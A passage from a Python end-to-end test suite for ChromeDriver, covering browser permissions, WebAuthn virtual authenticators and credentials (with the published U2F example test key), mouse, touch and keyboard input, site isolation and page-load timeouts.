self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'notifications' }, 'state': 'granted' } push_descriptor = { 'name': 'push', 'userVisibleOnly': True } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('notifications'), 'granted') self.CheckPermission(self.GetPermissionWithQuery(push_descriptor), 'granted') parameters['state'] = 'denied' self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('notifications'), 'denied') self.CheckPermission(self.GetPermissionWithQuery(push_descriptor), 'denied') push_descriptor['userVisibleOnly'] = False parameters = { 'descriptor': push_descriptor, 'state': 'prompt' } self.assertRaises(chromedriver.InvalidArgument, self._driver.SetPermission, parameters) def testPermissionsSameOrigin(self): """ Assures permissions are shared between same-domain windows. """ window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) another_window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(another_window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) # Set permission. parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'granted' } # Test that they are present across the same domain. self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('geolocation'), 'granted') self._driver.SwitchToWindow(window_handle) self.CheckPermission(self.GetPermission('geolocation'), 'granted') def testNewWindowSameDomainHasSamePermissions(self): """ Assures permissions are shared between same-domain windows, even when window is created after permissions are set. """ window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') same_domain = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(same_domain) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) self.CheckPermission(self.GetPermission('geolocation'), 'denied') def testPermissionsSameOriginDoesNotAffectOthers(self): """ Tests whether permissions set between two domains affect others. """ window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) another_window_handle = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(another_window_handle) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) different_domain = self._driver.NewWindow()['handle'] self._driver.SwitchToWindow(different_domain) self._driver.Load('https://google.com') self._driver.SetPermission({ 'descriptor': {'name': 'geolocation'}, 'state': 'denied' }) # Switch for permissions. self._driver.SwitchToWindow(another_window_handle) # Set permission. parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'prompt' } # Test that they are present across the same domain. self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') self._driver.SwitchToWindow(window_handle) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') # Assert different domain is not the same. self._driver.SwitchToWindow(different_domain) self.CheckPermission(self.GetPermission('geolocation'), 'denied') # Tests that the webauthn capabilities are true on desktop and false on # android. def testWebauthnVirtualAuthenticatorsCapability(self): is_desktop = _ANDROID_PACKAGE_KEY is None self.assertEqual( is_desktop, self._driver.capabilities['webauthn:virtualAuthenticators']) self.assertEqual( is_desktop, self._driver.capabilities['webauthn:extension:largeBlob']) class ChromeDriverBackgroundTest(ChromeDriverBaseTestWithWebServer): def setUp(self): self._driver1 = self.CreateDriver() self._driver2 = self.CreateDriver() def testBackgroundScreenshot(self): self._driver2.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') self._driver1.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') screenshotPNGBase64 = self._driver1.TakeScreenshot() self.assertIsNotNone(screenshotPNGBase64) # Tests that require a secure context. class ChromeDriverSecureContextTest(ChromeDriverBaseTestWithWebServer): # The example attestation private key from the U2F spec at # https://fidoalliance.org/specs/fido-u2f-v1.2-ps-20170411/fido-u2f-raw-message-formats-v1.2-ps-20170411.html#registration-example # PKCS.8 encoded without encryption, as a base64url string. privateKey = ("MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQg8_zMDQDYAxlU-Q" "hk1Dwkf0v18GZca1DMF3SaJ9HPdmShRANCAASNYX5lyVCOZLzFZzrIKmeZ2jwU" "RmgsJYxGP__fWN_S-j5sN4tT15XEpN_7QZnt14YvI6uvAgO0uJEboFaZlOEB") @staticmethod def GetHttpsUrlForFile(file_path, host=None): return ChromeDriverSecureContextTest._https_server.GetUrl( host) + file_path # Encodes a string in URL-safe base64 with no padding. @staticmethod def URLSafeBase64Encode(string): encoded = base64.urlsafe_b64encode(string) while encoded[-1] == "=": encoded = encoded[0:-1] return encoded # Decodes a base64 string with no padding. @staticmethod def UrlSafeBase64Decode(string): string = string.encode("utf-8") if len(string) % 4 != 0: string += "=" * (4 - len(string) % 4) return base64.urlsafe_b64decode(string) def setUp(self): self._driver = self.CreateDriver( accept_insecure_certs=True, chrome_switches=['host-resolver-rules=MAP * 127.0.0.1', 'enable-experimental-web-platform-features']) def testAddVirtualAuthenticator(self): script = """ let done = arguments[0]; registerCredential({ authenticatorSelection: { requireResidentKey: true, }, extensions: { largeBlob: { support: 'preferred', }, }, }).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) self._driver.AddVirtualAuthenticator( protocol = 'ctap2_1', transport = 'usb', hasResidentKey = True, hasUserVerification = True, isUserConsenting = True, isUserVerified = True, extensions = ['largeBlob'] ) result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) self.assertEquals(['usb'], result['credential']['transports']) self.assertEquals(True, result['extensions']['largeBlob']['supported']) def testAddVirtualAuthenticatorProtocolVersion(self): self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) for protocol in ['ctap1/u2f', 'ctap2', 'ctap2_1']: authenticator_id = self._driver.AddVirtualAuthenticator( protocol = protocol, transport = 'usb', ) self.assertTrue(len(authenticator_id) > 0) self.assertRaisesRegexp( chromedriver.UnsupportedOperation, 'INVALID is not a recognized protocol version', self._driver.AddVirtualAuthenticator, protocol = 'INVALID', transport = 'usb') def testAddVirtualBadExtensions(self): self.assertRaisesRegexp( chromedriver.InvalidArgument, 'extensions must be a list of strings', self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport = 'usb', extensions = 'invalid') self.assertRaisesRegexp( chromedriver.InvalidArgument, 'extensions must be a list of strings', self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport = 'usb', extensions = [42]) self.assertRaisesRegexp( chromedriver.UnsupportedOperation, 'smolBlowbs is not a recognized extension', self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport = 'usb', extensions = ['smolBlowbs']) def testAddVirtualAuthenticatorDefaultParams(self): script = """ let done = arguments[0]; registerCredential().then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) self._driver.AddVirtualAuthenticator( protocol = 'ctap1/u2f', transport = 'usb', ) result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) self.assertEquals(['usb'], result['credential']['transports']) def testRemoveVirtualAuthenticator(self): self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) # Removing a non existent virtual authenticator should fail. self.assertRaisesRegexp( chromedriver.InvalidArgument, 'Could not find a Virtual Authenticator matching the ID', self._driver.RemoveVirtualAuthenticator, 'id') # Create an authenticator and try removing it. authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', hasResidentKey = False, hasUserVerification = False, ) self._driver.RemoveVirtualAuthenticator(authenticatorId) # Trying to remove the same authenticator should fail. self.assertRaisesRegexp( chromedriver.InvalidArgument, 'Could not find a Virtual Authenticator matching the ID', self._driver.RemoveVirtualAuthenticator, authenticatorId) def testAddCredential(self): script = """ let done = arguments[0]; getCredential({ type: "public-key", id: new TextEncoder().encode("cred-1"), transports: ["usb"], }).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', hasResidentKey = False, hasUserVerification = False, ) # Register a credential and try authenticating with it. self._driver.AddCredential( authenticatorId = authenticatorId, credentialId = self.URLSafeBase64Encode("cred-1"), isResidentCredential=False, rpId="chromedriver.test", privateKey=self.privateKey, signCount=1, ) result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) def testAddCredentialLargeBlob(self): script = """ let done = arguments[0]; getCredential({ type: "public-key", id: new TextEncoder().encode("cred-1"), transports: ["usb"], }, { extensions: { largeBlob: { read: true, }, }, }).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2_1', transport = 'usb', hasResidentKey = True, hasUserVerification = True, isUserVerified = True, extensions = ['largeBlob'] ) # Register a credential with a large blob and try reading it. self._driver.AddCredential( authenticatorId = authenticatorId, credentialId = self.URLSafeBase64Encode('cred-1'), userHandle = self.URLSafeBase64Encode('erina'), largeBlob = self.URLSafeBase64Encode('large blob contents'), isResidentCredential = True, rpId = "chromedriver.test", privateKey = self.privateKey, signCount = 1, ) result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) self.assertEquals('large blob contents', result['blob']) def testAddCredentialBase64Errors(self): # Test that AddCredential checks UrlBase64 parameteres. self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', hasResidentKey = False, hasUserVerification = False, ) # Try adding a credentialId that is encoded in vanilla base64. self.assertRaisesRegexp( chromedriver.InvalidArgument, 'credentialId must be a base64url encoded string', self._driver.AddCredential, authenticatorId, '_0n+wWqg=', False, "chromedriver.test", self.privateKey, None, 1, ) # Try adding a credentialId that is not a string. self.assertRaisesRegexp( chromedriver.InvalidArgument, 'credentialId must be a base64url encoded string', self._driver.AddCredential, authenticatorId, 1, False, "chromedriver.test", self.privateKey, None, 1, ) def testGetCredentials(self): script = """ let done = arguments[0]; registerCredential({ authenticatorSelection: { requireResidentKey: true, }, extensions: { largeBlob: { support: "required", }, }, }).then(attestation => getCredential({ type: "public-key", id: Uint8Array.from(attestation.credential.rawId), transports: ["usb"], }, { extensions: { largeBlob: { write: new TextEncoder().encode("large blob contents"), }, }, })).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2_1', transport = 'usb', hasResidentKey = True, hasUserVerification = True, isUserVerified = True, extensions = ['largeBlob'] ) # Register a credential via the webauthn API and set a large blob on it. result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) self.assertEquals(True, result['extensions']['largeBlob']['written']) credentialId = result['attestation']['id'] # GetCredentials should return the credential that was just created. credentials = self._driver.GetCredentials(authenticatorId) self.assertEquals(1, len(credentials)) self.assertEquals(credentialId, credentials[0]['credentialId']) self.assertEquals(True, credentials[0]['isResidentCredential']) self.assertEquals('chromedriver.test', credentials[0]['rpId']) self.assertEquals(chr(1), self.UrlSafeBase64Decode(credentials[0]['userHandle'])) self.assertEquals(2, credentials[0]['signCount']) self.assertTrue(credentials[0]['privateKey']) self.assertEquals('large blob contents', self.UrlSafeBase64Decode(credentials[0]['largeBlob'])) def testRemoveCredential(self): script = """ let done = arguments[0]; registerCredential().then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', ) # Register two credentials. result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) credential1Id = result['credential']['id'] result = self._driver.ExecuteAsyncScript(script) self.assertEquals('OK', result['status']) credential2Id = result['credential']['id'] # GetCredentials should return both credentials. credentials = self._driver.GetCredentials(authenticatorId) self.assertEquals(2, len(credentials)) # Removing the first credential should leave only the first one. self._driver.RemoveCredential(authenticatorId, credential1Id) credentials = self._driver.GetCredentials(authenticatorId) self.assertEquals(1, len(credentials)) self.assertEquals(credential2Id, credentials[0]['credentialId']) def testRemoveAllCredentials(self): register_credential_script = """ let done = arguments[0]; registerCredential().then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', ) # Register a credential via the webauthn API. result = self._driver.ExecuteAsyncScript(register_credential_script) self.assertEquals('OK', result['status']) credentialId = result['credential']['rawId'] # Attempting to register with the credential ID on excludeCredentials should # fail. exclude_credentials_script = """ let done = arguments[0]; registerCredential({ excludeCredentials: [{ type: "public-key", id: Uint8Array.from(%s), transports: ["usb"], }], }).then(done); """ % (credentialId) result = self._driver.ExecuteAsyncScript(exclude_credentials_script) self.assertEquals("InvalidStateError: The user attempted to register an " "authenticator that contains one of the credentials " "already registered with the relying party.", result['status']) # The registration should succeed after clearing the credentials. self._driver.RemoveAllCredentials(authenticatorId) result = self._driver.ExecuteAsyncScript(exclude_credentials_script) self.assertEquals('OK', result['status']) def testSetUserVerified(self): register_uv_script = """ let done = arguments[0]; registerCredential({ authenticatorSelection: { userVerification: "required", }, }).then(done); """ self._driver.Load(self.GetHttpsUrlForFile( '/chromedriver/webauthn_test.html', 'chromedriver.test')) authenticatorId = self._driver.AddVirtualAuthenticator( protocol = 'ctap2', transport = 'usb', hasResidentKey = True, hasUserVerification = True, ) # Configure the virtual authenticator to fail user verification. self._driver.SetUserVerified(authenticatorId, False) # Attempting to register a credential with UV required should fail. result = self._driver.ExecuteAsyncScript(register_uv_script) self.assertTrue(result['status'].startswith("NotAllowedError"), "Expected %s to be a NotAllowedError" % (result['status'])) # Trying again after setting userVerified to True should succeed. self._driver.SetUserVerified(authenticatorId, True) result = self._driver.ExecuteAsyncScript(register_uv_script) self.assertEquals("OK", result['status']) # Tests in the following class are expected to be moved to ChromeDriverTest # class when we no longer support the legacy mode. class ChromeDriverW3cTest(ChromeDriverBaseTestWithWebServer): """W3C mode specific tests.""" def setUp(self): self._driver = self.CreateDriver( send_w3c_capability=True, send_w3c_request=True) def testSendKeysToElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) text = self._driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.addEventListener("change", function() {' ' document.body.appendChild(document.createElement("br"));' '});' 'return input;') text.SendKeys('0123456789+-*/ Hi') text.SendKeys(', there!') value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('0123456789+-*/ Hi, there!', value) def testSendKeysToElementDoesNotAppend(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) textControlTypes = ["text", "search", "tel", "url", "password"] for textType in textControlTypes: element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<input type="{}" value="send_this_value">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.focus();' 'input.setSelectionRange(0,0);' 'return input;'.format(textType)) element.SendKeys('hello') value = self._driver.ExecuteScript('return arguments[0].value;', element) self.assertEquals('hellosend_this_value', value) def testSendKeysToEditableElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<p contentEditable="true"> <i>hello-></i> ' '<b>send_this_value </b> </p>\';' 'var input = document.getElementsByTagName("i")[0];' 'return input;') element.SendKeys('hello') self.assertEquals(u'hello->hello', element.GetText()) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<p contentEditable="true"> <i>hello</i> ' '<b>-></b> </p>\';' 'var input = document.getElementsByTagName("p")[0];' 'input.focus();' 'return input;') element.SendKeys('hello') self.assertEquals(u'hellohello ->', element.GetText()) def testUnexpectedAlertOpenExceptionMessage(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('window.alert("Hi");') self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, '{Alert text : Hi}', self._driver.FindElement, 'tag name', 'divine') # In W3C mode, the alert is dismissed by default. self.assertFalse(self._driver.IsAlertOpen()) class ChromeDriverTestLegacy(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver in Legacy mode.""" def setUp(self): self._driver = self.CreateDriver(send_w3c_capability=False, send_w3c_request=False) def testContextMenuEventFired(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html')) self._driver.MouseMoveTo(self._driver.FindElement('tag name', 'div')) self._driver.MouseClick(2) self.assertTrue(self._driver.ExecuteScript('return success')) def testDragAndDropWithSVGImage(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/drag_and_drop.svg')) drag = self._driver.FindElement("css selector", "#GreenRectangle") drop = self._driver.FindElement("css selector", "#FolderRectangle") self._driver.MouseMoveTo(drag) self._driver.MouseButtonDown() self._driver.MouseMoveTo(drop) self._driver.MouseButtonUp() self.assertTrue(self._driver.IsAlertOpen()) self.assertEquals('GreenRectangle has been dropped into a folder.', self._driver.GetAlertMessage()) self._driver.HandleAlert(True) self.assertEquals('translate(300,55)', drag.GetAttribute("transform")) def testMouseButtonDownAndUp(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("mousedown", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new1<br>";' '});' 'div.addEventListener("mouseup", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new2<a></a>";' '});') self._driver.MouseMoveTo(None, 50, 50) self._driver.MouseButtonDown() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) self._driver.MouseButtonUp() self.assertEquals(1, len(self._driver.FindElements('tag name', 'a'))) def testMouseClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("click", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') self._driver.MouseMoveTo(div) self._driver.MouseClick() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testMouseDoubleClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') self._driver.MouseMoveTo(div, 1, 1) self._driver.MouseDoubleClick() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testMouseMoveTo(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("mouseover", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') self._driver.MouseMoveTo(div, 10, 10) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testMoveToElementAndClick(self): # This page gets rendered differently depending on which platform the test # is running on, and what window size is being used. So we need to do some # sanity checks to make sure that the <a> element is split across two lines # of text. self._driver.Load(self.GetHttpUrlForFile('/chromedriver/multiline.html')) # Check that link element spans two lines and that the first ClientRect is # above the second. link = self._driver.FindElements('tag name', 'a')[0] client_rects = self._driver.ExecuteScript( 'return arguments[0].getClientRects();', link) self.assertEquals(2, len(client_rects)) self.assertTrue(client_rects[0]['bottom'] <= client_rects[1]['top']) # Check that the center of the link's bounding ClientRect is outside the # element. bounding_client_rect = self._driver.ExecuteScript( 'return arguments[0].getBoundingClientRect();', link) center = bounding_client_rect['left'] + bounding_client_rect['width'] / 2 self.assertTrue(client_rects[1]['right'] < center) self.assertTrue(center < client_rects[0]['left']) self._driver.MouseMoveTo(link) self._driver.MouseClick() self.assertTrue(self._driver.GetCurrentUrl().endswith('#top')) def _FindElementInShadowDom(self, css_selectors): """Find an element inside shadow DOM using CSS selectors. The last item in css_selectors identify the element to find. All preceding selectors identify the hierarchy of shadow hosts to traverse in order to reach the target shadow DOM.""" current = None for selector in css_selectors: if current is None: # First CSS selector, start from root DOM. current = self._driver else: # current is a shadow host selected previously. # Enter the corresponding shadow root. current = self._driver.ExecuteScript( 'return arguments[0].shadowRoot', current) current = current.FindElement('css selector', selector) return current def testShadowDomDisplayed(self): """Checks that trying to manipulate shadow DOM elements that are detached from the document raises a StaleElementReference exception""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#button"]) self.assertTrue(elem.IsDisplayed()) elem2 = self._driver.FindElement("css selector", "#hostContent") self.assertTrue(elem2.IsDisplayed()) self._driver.ExecuteScript( 'document.querySelector("#outerDiv").style.display="None";') self.assertFalse(elem.IsDisplayed()) def testSendingTabKeyMovesToNextInputElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html')) first = self._driver.FindElement('css selector', '#first') second = self._driver.FindElement('css selector', '#second') first.Click() self._driver.SendKeys('snoopy') self._driver.SendKeys(u'\uE004') self._driver.SendKeys('prickly pete') self.assertEquals('snoopy', self._driver.ExecuteScript( 'return arguments[0].value;', first)) self.assertEquals('prickly pete', self._driver.ExecuteScript( 'return arguments[0].value;', second)) def testMobileEmulationDisabledByDefault(self): self.assertFalse(self._driver.capabilities['mobileEmulationEnabled']) def testSendKeysToElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) text = self._driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.addEventListener("change", function() {' ' document.body.appendChild(document.createElement("br"));' '});' 'return input;') text.SendKeys('0123456789+-*/ Hi') text.SendKeys(', there!') value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('0123456789+-*/ Hi, there!', value) def testUnexpectedAlertOpenExceptionMessage(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('window.alert("Hi");') self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, 'unexpected alert open: {Alert text : Hi}', self._driver.FindElement, 'tag name', 'divine') def testTouchScrollElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) scroll_left = 'return document.documentElement.scrollLeft;' scroll_top = 'return document.documentElement.scrollTop;' self.assertEquals(0, self._driver.ExecuteScript(scroll_left)) self.assertEquals(0, self._driver.ExecuteScript(scroll_top)) target = self._driver.FindElement('css selector', '#target') self._driver.TouchScroll(target, 47, 53) # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1179 self.assertAlmostEqual(47, self._driver.ExecuteScript(scroll_left), delta=1) self.assertAlmostEqual(53, self._driver.ExecuteScript(scroll_top), delta=1) def testTouchDoubleTapElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') target.DoubleTap() events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart touchend touchstart touchend', events.GetText()) def testTouchLongPressElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') target.LongPress() events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart touchcancel', events.GetText()) def testTouchSingleTapElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') target.SingleTap() events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart touchend', events.GetText()) class ChromeDriverSiteIsolation(ChromeDriverBaseTestWithWebServer): """Tests for ChromeDriver with the new Site Isolation Chrome feature. This feature can be turned on using the --site-per-process flag. In order to trick the test into thinking that we are on two separate origins, the cross_domain_iframe.html code points to localhost instead of 127.0.0.1. Note that Chrome does not allow "localhost" to be passed to --isolate-origins for fixable technical reasons related to subdomain matching. """ def setUp(self): self._driver = self.CreateDriver(chrome_switches=['--site-per-process']) def testCanClickOOPIF(self): """Test that you can click into an Out of Process I-Frame (OOPIF). Note that the Iframe will not be out-of-process if the correct flags are not passed into Chrome. """ if util.GetPlatformName() == 'win': # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198 # This test is unreliable on Windows, as FindElement can be called too # soon, before the child frame is fully loaded. This causes element not # found error. Add an implicit wait works around this issue. self._driver.SetTimeouts({'implicit': 2000}) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/cross_domain_iframe.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self.assertTrue(self.WaitForCondition( lambda: 'outer.html' in self._driver.ExecuteScript('return window.location.href'))) self.assertTrue(self.WaitForCondition( lambda: 'complete' == self._driver.ExecuteScript('return document.readyState'))) self._driver.SwitchToMainFrame() a_outer = self._driver.FindElement('tag name', 'a') a_outer.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#one')) self._driver.SwitchToFrame(frame) a_inner = self._driver.FindElement('tag name', 'a') a_inner.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#two')) class ChromeDriverPageLoadTimeoutTest(ChromeDriverBaseTestWithWebServer): class _RequestHandler(object): def __init__(self): self.request_received_event = threading.Event() self.send_response_event = threading.Event() def handle(self, request): self.request_received_event.set() # Don't hang infinitely, 10 seconds are enough. self.send_response_event.wait(10) self.send_response_event.clear() return {'Cache-Control': 'no-store'}, 'Hi!' def setUp(self): self._handler = ChromeDriverPageLoadTimeoutTest._RequestHandler() self._http_server.SetCallbackForPath('/hang', self._handler.handle) super(ChromeDriverPageLoadTimeoutTest, self).setUp() self._driver = self.CreateDriver( chrome_switches=['host-resolver-rules=MAP * 127.0.0.1']) self._initial_url = self.GetHttpUrlForFile('/chromedriver/empty.html') self._driver.Load(self._initial_url) # When send_response_event is set, navigating to the hang URL takes only # about 0.1 second on Linux and Windows, but takes half a second or longer # on Mac. So we use longer timeout on Mac, 0.5 second on others. timeout = 3000 if util.GetPlatformName() == 'mac' else 500 self._driver.SetTimeouts({'pageLoad': timeout}) def tearDown(self): super(ChromeDriverPageLoadTimeoutTest, self).tearDown() self._http_server.SetCallbackForPath('/hang', None) def _LoadHangingUrl(self, host=None): self._driver.Load(self._http_server.GetUrl(host) + '/hang') def _CheckPageLoadTimeout(self, action): self._handler.request_received_event.clear() timed_out = False try: action() except chromedriver.ChromeDriverException as e: self.assertNotEqual(-1, e.message.find('timeout')) timed_out = True finally: self._handler.send_response_event.set() self.assertTrue(timed_out) # Verify that the browser actually made that request. self.assertTrue(self._handler.request_received_event.wait(1)) def testPageLoadTimeout(self): self._CheckPageLoadTimeout(self._LoadHangingUrl) self.assertEquals(self._initial_url, self._driver.GetCurrentUrl()) def testPageLoadTimeoutCrossDomain(self): # Cross-domain navigation is likely to be a cross-process one. In this case # DevToolsAgentHost behaves quite differently and does not send command # responses if the navigation hangs, so this case deserves a dedicated test. self._CheckPageLoadTimeout(lambda: self._LoadHangingUrl('foo.bar')) self.assertEquals(self._initial_url, self._driver.GetCurrentUrl()) def testHistoryNavigationWithPageLoadTimeout(self): # Allow the page to load for the first time. self._handler.send_response_event.set() self._LoadHangingUrl() self.assertTrue(self._handler.request_received_event.wait(1)) self._driver.GoBack() self._CheckPageLoadTimeout(self._driver.GoForward) self.assertEquals(self._initial_url, self._driver.GetCurrentUrl()) def testRefreshWithPageLoadTimeout(self): # Allow the page to load for the first time. self._handler.send_response_event.set() self._LoadHangingUrl() self.assertTrue(self._handler.request_received_event.wait(1)) self._CheckPageLoadTimeout(self._driver.Refresh) class ChromeDriverAndroidTest(ChromeDriverBaseTest): """End to end tests for Android-specific tests.""" def testLatestAndroidAppInstalled(self): if ('stable' not in _ANDROID_PACKAGE_KEY and 'beta' not in _ANDROID_PACKAGE_KEY): return self._driver = self.CreateDriver() try: omaha_list = json.loads( urllib2.urlopen('http://omahaproxy.appspot.com/all.json').read()) for l in omaha_list: if l['os'] != 'android': continue for v in l['versions']: if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY) or ('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)): omaha = map(int, v['version'].split('.')) device = map(int, self._driver.capabilities['browserVersion'].split('.')) self.assertTrue(omaha <= device) return raise RuntimeError('Malformed omaha JSON') except urllib2.URLError as e: print 'Unable to fetch current version info from omahaproxy (%s)' % e def testDeviceManagement(self): self._drivers = [self.CreateDriver() for _ in device_utils.DeviceUtils.HealthyDevices()] self.assertRaises(chromedriver.UnknownError, self.CreateDriver) self._drivers[0].Quit() self._drivers[0] = self.CreateDriver() def testAndroidGetWindowSize(self): self._driver = self.CreateDriver() size = self._driver.GetWindowRect() script_size = self._driver.ExecuteScript( 'return [window.outerWidth, window.outerHeight, 0, 